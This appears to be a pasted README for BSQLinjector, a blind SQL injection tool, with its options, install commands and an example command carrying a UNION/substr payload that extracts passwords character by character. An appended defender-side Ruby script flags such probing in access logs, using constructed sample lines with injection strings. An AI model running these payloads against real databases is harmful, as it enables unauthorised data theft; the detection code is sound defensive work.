TVT618

BSQLinjector - Blind SQL Injection Exploit tool

Jul 26th, 2018
BSQLinjector:
BSQLinjector uses a blind method to retrieve data from SQL databases. I recommend using the "--test" switch to see clearly what the configured payload looks like before sending it to an application.

Options:
--file        Mandatory - File containing a valid HTTP request and the SQL injection point (SQLINJECT). (--file=/tmp/req.txt)
--pattern     Mandatory - Pattern to look for when the query is true. (--pattern=truestatement)
--prepend     Mandatory - Main payload. (--prepend="abcd'and'a'='b'+union+select+'truestatement'+from+table+where+col%3d'value'+and+substr(password,")
--append      How to end the payload, for example by commenting out the rest of the SQL statement. (--append='#)
--schar       Character placed around chars. This character is not used in hex mode. (--schar="'")
--2ndfile     File containing a valid HTTP request used in second-order exploitation. (--2ndfile=/tmp/2ndreq.txt)

--mode        Blind mode to use - (between - b (generates fewer requests), moreless - a (generates fewer requests by using "<", ">", "=" characters), like - l (complete bruteforce), equals - e (complete bruteforce)). (--mode=l)
--postgres    Use postgres "for" in the substring function (e.g. from 1 for 1).
--hex         Use hex to compare instead of characters.
--case        Case sensitivity.

--ssl         Use SSL.
--proxy       Proxy to use. (--proxy=127.0.0.1:8080)

--test        Enable test mode. Do not send the request, just show the full payload.
--special     Include all special characters in enumeration.
--start       Start enumeration from the specified character. (--start=10)
--max         Maximum characters to enumerate. (--max=10)
--timeout     Timeout in waiting for responses. (--timeout=20)
--only-final  Stop showing each enumerated letter.
--comma       Encode comma.
--bracket     Add brackets to the end of the substring function. (--bracket="))")
--hexspace    Use space instead of brackets to split hex values.
--verbose     Show verbose messages.

Install on Linux:
git clone https://github.com/enjoiz/BSQLinjector/
cd BSQLinjector
ruby BSQLinjector.rb -h

Install on Windows:
Install Ruby from Ruby-lang.org
Install Git from Git-scm.com

Open Command Prompt and enter the following commands:
git clone https://github.com/enjoiz/BSQLinjector/
cd BSQLinjector
ruby BSQLinjector.rb -h

Example usage:
ruby ./BSQLinjector.rb --pattern=truestatement --file=/tmp/req.txt --schar="'" --prepend="abcd'and'a'='b'+union+select+'truestatement'+from+table+where+col%3d'value'+and+substr(password," --append="'#" --ssl

Download BSQLinjector: https://github.com/enjoiz/BSQLinjector/
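
Added example (not part of the original paste or of the BSQLinjector project): a defender-side Ruby script that flags, in a web access log, the request pattern the blind modes above produce, namely one client walking successive substr()/substring() offsets against the same endpoint. The log format, regexes, function names, threshold and sample lines are constructed assumptions.

```ruby
require 'uri'
require 'set'
# substr(col,N ...) or substring(col from N ...), the --postgres form; captures col and N.
SUBSTR_RE = /\bsubstr(?:ing)?\s*\(\s*([^,()]+?)\s*(?:,|\s+from\s+)\s*(\d+)/i
# Common Log Format (assumed): captures client address and request target.
LOG_RE = /\A(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" \d{3} \d+/

# Constructed sample log, not captured traffic: one client walks substr()
# offsets 1..4 with three guesses each; two other clients send ordinary requests.
def sample_log
  lines = []
  (1..4).each do |pos|
    %w[a b c].each do |ch|
      q = "id=1%27+and+substr(password,#{pos},1)%3d%27#{ch}%27%23"
      lines << %Q|203.0.113.7 - - [26/Jul/2018:10:00:00 +0000] "GET /item?#{q} HTTP/1.1" 200 512|
    end
  end
  lines << %Q|198.51.100.4 - - [26/Jul/2018:10:00:05 +0000] "GET /item?id=42 HTTP/1.1" 200 734|
  lines << %Q|198.51.100.9 - - [26/Jul/2018:10:00:09 +0000] "GET /search?q=substr(name,1)+docs HTTP/1.1" 200 901|
end

# Returns [client, path, column, offset] for a line carrying a substring probe, else nil.
def probe(line)
  m = LOG_RE.match(line) or return nil
  path, query = m[2].split('?', 2)
  decoded = begin
    URI.decode_www_form_component(query.to_s)
  rescue ArgumentError
    query.to_s # malformed %-encoding: inspect the raw text instead
  end
  s = SUBSTR_RE.match(decoded) or return nil
  [m[1], path, s[1].downcase, s[2].to_i]
end

# Groups probes by client/path/column and reports groups touching at least
# min_positions distinct offsets: character-by-character extraction, not a one-off match.
def detect(lines, min_positions: 3)
  groups = Hash.new { |h, k| h[k] = { requests: 0, positions: Set.new } }
  lines.each do |line|
    client, path, col, pos = probe(line)
    next unless client
    g = groups[[client, path, col]]
    g[:requests] += 1
    g[:positions] << pos
  end
  flagged = groups.select { |_, g| g[:positions].size >= min_positions }
  flagged.map { |(cl, pth, col), g| { client: cl, path: pth, column: col, requests: g[:requests], positions: g[:positions].sort } }
end
detect(sample_log).each { |hit| puts hit.inspect }
```

The distinct-offset threshold keeps a single request that merely mentions substr() (the /search line in the sample) from being reported; hex-mode comparisons and second-order requests are outside what this check covers.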